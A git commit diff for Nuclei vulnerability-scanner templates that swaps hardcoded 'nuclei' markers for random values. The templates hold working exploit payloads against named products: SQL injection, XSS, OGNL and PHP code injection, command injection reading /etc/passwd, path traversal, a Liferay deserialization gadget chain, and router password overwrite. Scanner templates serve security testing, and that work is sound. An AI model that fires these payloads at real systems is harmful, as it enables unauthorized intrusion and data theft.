Replaced Hardcoded Nuclei Keyword
parent
45e59c0257
commit
f8d7275527
|
@ -1,4 +1,4 @@
|
|||
id: credentials-disclosure-file
|
||||
id: credentials-disclosure
|
||||
|
||||
info:
|
||||
name: Credentials Disclosure Check
|
||||
|
|
|
@ -25,19 +25,22 @@ info:
|
|||
product: wsecure
|
||||
tags: cve,cve2016,wordpress,wp-plugin,rce
|
||||
|
||||
variables:
|
||||
name: "{{to_lower(rand_text_alpha(5))}}"
|
||||
|
||||
http:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"
|
||||
|
||||
body: 'wsecure_action=update&publish=";} header("Nuclei: CVE-2016-10960"); class WSecureConfig2 {var $test="'
|
||||
body: 'wsecure_action=update&publish=";} header("{{name}}: CVE-2016-10960"); class WSecureConfig2 {var $test="'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "Nuclei: CVE-2016-10960"
|
||||
- "{{name}}: CVE-2016-10960"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
|
|
|
@ -27,7 +27,7 @@ info:
|
|||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/passwordrecovered.cgi?id=nuclei"
|
||||
- "{{BaseURL}}/passwordrecovered.cgi?id={{rand_base(5)}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -37,7 +37,7 @@ http:
|
|||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode(command)}}')]=nuclei
|
||||
name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode(command)}}')]={{to_lower(rand_text_alpha(5))}}
|
||||
|
||||
payloads:
|
||||
command:
|
||||
|
|
|
@ -23,10 +23,13 @@ info:
|
|||
product: jck_editor
|
||||
tags: cve,cve2018,packetstorm,edb,joomla,sqli
|
||||
|
||||
variables:
|
||||
num: "999999999"
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),0x6e75636c65692d74656d706c617465),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1
|
||||
GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5({{num}})),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Referer: {{BaseURL}}
|
||||
|
||||
|
@ -34,4 +37,4 @@ http:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "nuclei-template"
|
||||
- '{{md5(num)}}'
|
||||
|
|
|
@ -30,7 +30,7 @@ http:
|
|||
path:
|
||||
- "{{BaseURL}}/wp-admin/options-general.php?page=smartcode"
|
||||
|
||||
body: 'sgcgoogleanalytic=<script>console.log("Nuclei - Open-source project [github.com/projectdiscovery/nuclei]")</script>&sgcwebtools=&button=Save+Changes&action=savegooglecode'
|
||||
body: 'sgcgoogleanalytic=<script>console.log("document.domain")</script>&sgcwebtools=&button=Save+Changes&action=savegooglecode'
|
||||
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
@ -49,7 +49,7 @@ http:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<script>console.log("Nuclei - Open-source project [github.com/projectdiscovery/nuclei]")</script>'
|
||||
- '<script>console.log("document.domain")</script>'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -24,13 +24,16 @@ info:
|
|||
product: struts
|
||||
tags: tenable,packetstorm,struts,rce,cve,cve2019,apache
|
||||
|
||||
variables:
|
||||
str: "{{rand_base(6)}}"
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/?id=nuclei%25{128*128}"
|
||||
- "{{BaseURL}}/?id={{str}}%25{128*128}"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "nuclei16384"
|
||||
- "{{str}}16384"
|
||||
|
|
|
@ -21,19 +21,23 @@ info:
|
|||
product: youphptube_encoder
|
||||
tags: cve,cve2019,rce
|
||||
|
||||
variables:
|
||||
filename: "{{to_lower(rand_text_alpha(5))}}"
|
||||
encode: "`id > {{filename}}.txt`"
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png"
|
||||
- "{{BaseURL}}/objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg"
|
||||
- "{{BaseURL}}/objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg"
|
||||
- "{{BaseURL}}/objects/getImage.php?base64Url={{base64(encode)}}=&format=png"
|
||||
- "{{BaseURL}}/objects/getImageMP4.php?base64Url={{base64(encode)}}=&format=jpg"
|
||||
- "{{BaseURL}}/objects/getSpiritsFromVideo.php?base64Url={{base64(encode)}}=&format=jpg"
|
||||
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/objects/nuclei.txt"
|
||||
- "{{BaseURL}}/objects/{{filename}}.txt"
|
||||
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
|
|
@ -25,14 +25,16 @@ info:
|
|||
product: orion_platform
|
||||
tags: cve,cve2020,solarwinds,rce,auth-bypass,kev
|
||||
|
||||
variables:
|
||||
string: "{{to_lower(rand_text_alpha(5))}}"
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/web.config.i18n.ashx?l=nuclei&v=nuclei"
|
||||
- "{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l=nuclei&v=nuclei"
|
||||
- "{{BaseURL}}/web.config.i18n.ashx?l={{string}}&v={{string}}"
|
||||
- "{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l={{string}}&v={{string}}"
|
||||
|
||||
stop-at-first-match: true
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
|
|
|
@ -29,6 +29,9 @@ info:
|
|||
product: unomi
|
||||
tags: cve,cve2020,apache,rce
|
||||
|
||||
variables:
|
||||
id: "{{to_lower(rand_text_alpha(5))}}"
|
||||
|
||||
http:
|
||||
- method: POST
|
||||
path:
|
||||
|
@ -38,7 +41,7 @@ http:
|
|||
{
|
||||
"filters": [
|
||||
{
|
||||
"id": "nuclei",
|
||||
"id": "{{id}}",
|
||||
"filters": [
|
||||
{
|
||||
"condition": {
|
||||
|
|
|
@ -22,14 +22,17 @@ info:
|
|||
product: tos
|
||||
tags: cve,cve2020,terramaster,rce
|
||||
|
||||
variables:
|
||||
filename: "{{to_lower(rand_text_alpha(4))}}"
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Enuclei.txt HTTP/1.1
|
||||
GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3E{{filename}}.txt HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
- |
|
||||
GET /include/nuclei.txt HTTP/1.1
|
||||
GET /include/{{filename}}.txt HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
|
|
|
@ -25,12 +25,16 @@ info:
|
|||
product: salt
|
||||
tags: vulhub,cve,cve2020,saltstack,kev
|
||||
|
||||
variables:
|
||||
priv: "{{to_lower(rand_text_alpha(5))}}"
|
||||
roaster: "{{to_lower(rand_text_alpha(6))}}"
|
||||
|
||||
http:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/run"
|
||||
|
||||
body: "token=1337&client=ssh&tgt=*&fun=a&roster=projectdiscovery&ssh_priv=nuclei"
|
||||
body: "token=1337&client=ssh&tgt=*&fun=a&roster={{roaster}}&ssh_priv={{priv}}"
|
||||
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded # CherryPy will abort w/o define this header
|
||||
|
|
|
@ -25,14 +25,14 @@ info:
|
|||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/carbon/admin/login.jsp?msgId=%27%3Balert(%27nuclei%27)%2F%2F'
|
||||
- '{{BaseURL}}/carbon/admin/login.jsp?msgId=%27%3Balert(%27document.domain%27)%2F%2F'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "'';alert('nuclei')//';"
|
||||
- "'';alert('document.domain')//';"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
|
|
|
@ -26,6 +26,9 @@ info:
|
|||
product: gmapfp
|
||||
tags: cve,cve2020,joomla,edb,packetstorm,fileupload,intrusive
|
||||
|
||||
variables:
|
||||
name: "{{to_lower(rand_text_alpha(5))}}"
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
|
@ -41,7 +44,7 @@ http:
|
|||
|
||||
com_gmapfp
|
||||
------WebKitFormBoundarySHHbUsfCoxlX1bpS
|
||||
Content-Disposition: form-data; name="image1"; filename="nuclei.html.gif"
|
||||
Content-Disposition: form-data; name="image1"; filename="{{name}}.html.gif"
|
||||
Content-Type: text/html
|
||||
|
||||
projectdiscovery
|
||||
|
|
|
@ -23,12 +23,15 @@ info:
|
|||
product: klog_server
|
||||
tags: cve,cve2020,klog,rce
|
||||
|
||||
variables:
|
||||
dummy: "{{to_lower(rand_text_alpha(5))}}"
|
||||
|
||||
http:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/actions/authenticate.php"
|
||||
|
||||
body: 'user=pdnuclei%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd=pdnuclei' # Payload: & echo "cHJvamVjdGRpc2NvdmVyeS5pbw==" | base64 -d & echo"
|
||||
body: 'user={{dummy}}%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd={{dummy}}' # Payload: & echo "cHJvamVjdGRpc2NvdmVyeS5pbw==" | base64 -d & echo"
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
|
|
|
@ -33,7 +33,7 @@ http:
|
|||
Referer: {{BaseURL}}/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData
|
||||
cmd2: {{command}}
|
||||
|
||||
cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D
|
||||
cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth={{to_lower(rand_text_alpha(5))}}&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D
|
||||
|
||||
payloads:
|
||||
command:
|
||||
|
|
|
@ -22,18 +22,21 @@ info:
|
|||
product: tew-827dru_firmware
|
||||
tags: disclosure,router,intrusive,tenable,cve,cve2021,trendnet
|
||||
|
||||
variables:
|
||||
password: "{{rand_base(6)}}"
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /apply_sec.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=nuclei
|
||||
ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password={{password}}
|
||||
- |
|
||||
POST /apply_sec.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass=bnVjbGVp&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=
|
||||
html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass={{base64(password)}}&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -27,14 +27,14 @@ info:
|
|||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/error3?msg=30&data=';alert('nuclei');//"
|
||||
- "{{BaseURL}}/omni_success?cmdb_edit_path=\");alert('nuclei');//"
|
||||
- "{{BaseURL}}/error3?msg=30&data=';alert('document.domain');//"
|
||||
- "{{BaseURL}}/omni_success?cmdb_edit_path=\");alert('document.domain');//"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "nuclei"
|
||||
- "alert('document.domain')"
|
||||
- "No policy has been chosen."
|
||||
condition: and
|
||||
|
|
|
@ -26,14 +26,14 @@ info:
|
|||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/sidekiq/queues/"onmouseover="alert(nuclei)"'
|
||||
- '{{BaseURL}}/sidekiq/queues/"onmouseover="alert(document.domain)"'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "onmouseover=\"alert('nuclei')"
|
||||
- "onmouseover=\"alert(document.domain)"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
|
|
|
@ -25,6 +25,9 @@ info:
|
|||
product: online_birth_certificate_system
|
||||
tags: cve,cve2022,xss,obcs,authenticated
|
||||
|
||||
variables:
|
||||
str: "{{rand_base(6)}}"
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
|
@ -38,7 +41,7 @@ http:
|
|||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
||||
fname=nuclei%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&lname=nuclei%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&add=New+Delhi+India+110001&submit=
|
||||
fname={{str}}%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&lname={{str}}%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&add=New+Delhi+India+110001&submit=
|
||||
- |
|
||||
GET /obcs/user/dashboard.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
@ -52,5 +55,5 @@ http:
|
|||
dsl:
|
||||
- 'contains(header_3, "text/html")'
|
||||
- 'status_code_3 == 200'
|
||||
- contains(body_3, 'admin-name\">nuclei<script>alert(document.domain);</script>')
|
||||
- contains(body_3, 'admin-name\">{{str}}<script>alert(document.domain);</script>')
|
||||
condition: and
|
||||
|
|
|
@ -18,6 +18,9 @@ info:
|
|||
metadata:
|
||||
max-request: 2
|
||||
|
||||
variables:
|
||||
str: "{{to_lower(rand_text_alpha(5))}}"
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
|
@ -25,14 +28,14 @@ http:
|
|||
Host: {{Hostname}}
|
||||
Content-Type: application/json
|
||||
|
||||
{"query":"query {\n nuclei1:__typename \n nuclei2:__typename \n nuclei3:__typename \n nuclei4:__typename \n nuclei5:__typename \n nuclei6:__typename \n }"}
|
||||
{"query":"query {\n {{str}}1:__typename \n {{str}}2:__typename \n {{str}}3:__typename \n {{str}}4:__typename \n {{str}}5:__typename \n {{str}}6:__typename \n }"}
|
||||
|
||||
- |
|
||||
POST /api/graphql HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json
|
||||
|
||||
{"query":"query {\n nuclei1:__typename \n nuclei2:__typename \n nuclei3:__typename \n nuclei4:__typename \n nuclei5:__typename \n nuclei6:__typename \n }"}
|
||||
{"query":"query {\n {{str}}1:__typename \n {{str}}2:__typename \n {{str}}3:__typename \n {{str}}4:__typename \n {{str}}5:__typename \n {{str}}6:__typename \n }"}
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
|
@ -41,8 +44,8 @@ http:
|
|||
part: body
|
||||
words:
|
||||
- '"data":'
|
||||
- '"nuclei1":'
|
||||
- '"nuclei6":'
|
||||
- '"{{str}}1":'
|
||||
- '"{{str}}6":'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -22,7 +22,7 @@ http:
|
|||
- https://2.intelx.io/authenticate/info
|
||||
headers:
|
||||
X-Key: "{{token}}"
|
||||
User-Agent: Nuclei (+https://nuclei.projectdiscovery.io)
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
|
|
|
@ -24,7 +24,7 @@ http:
|
|||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
username=admin'+or+'1'%3D'1'%23&password=nuclei
|
||||
username=admin'+or+'1'%3D'1'%23&password={{rand_base(5)}}
|
||||
|
||||
- |
|
||||
GET /admin/index.php?page=home HTTP/1.1
|
||||
|
|
|
@ -25,7 +25,7 @@ http:
|
|||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
username=admin%27+or+%271%27%3D%271%27%23&password=nuclei&login=
|
||||
username=admin%27+or+%271%27%3D%271%27%23&password={{rand_base(5)}}&login=
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 2
|
||||
|
|
|
@ -25,7 +25,7 @@ http:
|
|||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
mailuid=admin' or 1=1#&pwd=nuclei&login-submit=Login
|
||||
mailuid=admin' or 1=1#&pwd={{rand_base(5)}}&login-submit=Login
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 2
|
||||
|
|
|
@ -25,7 +25,7 @@ http:
|
|||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
username=admin'+or+'1'%3D'1'%23&password=nuclei
|
||||
username=admin'+or+'1'%3D'1'%23&password={{rand_base(5)}}
|
||||
|
||||
- |
|
||||
GET /index.php?page=home HTTP/1.1
|
||||
|
|
|
@ -18,13 +18,15 @@ info:
|
|||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=nuclei'
|
||||
- '{{BaseURL}}/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif={{rand_base(4)}}'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "root:x:0"
|
||||
|
|
|
@ -17,6 +17,9 @@ info:
|
|||
metadata:
|
||||
max-request: 2
|
||||
|
||||
variables:
|
||||
value: "{{to_lower(rand_text_alpha(5))}}"
|
||||
user_email: "{{username}}@{{to_lower(rand_text_alphanumeric(6))}}.com"
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
|
@ -26,7 +29,7 @@ http:
|
|||
Content-Type: application/json
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
|
||||
|
||||
{"message":"{\"msg\":\"method\",\"method\":\"livechat:registerGuest\",\"params\":[{\"token\":\"cvenucleirocketchat\",\"name\":\"cve-2020-nuclei\",\"email\":\"cve@nuclei.local\"}],\"id\":\"123\"}"}
|
||||
{"message":"{\"msg\":\"method\",\"method\":\"livechat:registerGuest\",\"params\":[{\"token\":\"{{value}}\",\"name\":\"cve-2020-{{value}}\",\"email\":\"{{user_email}}\"}],\"id\":\"123\"}"}
|
||||
|
||||
- |
|
||||
POST /api/v1/method.callAnon/cve_exploit HTTP/1.1
|
||||
|
@ -34,7 +37,7 @@ http:
|
|||
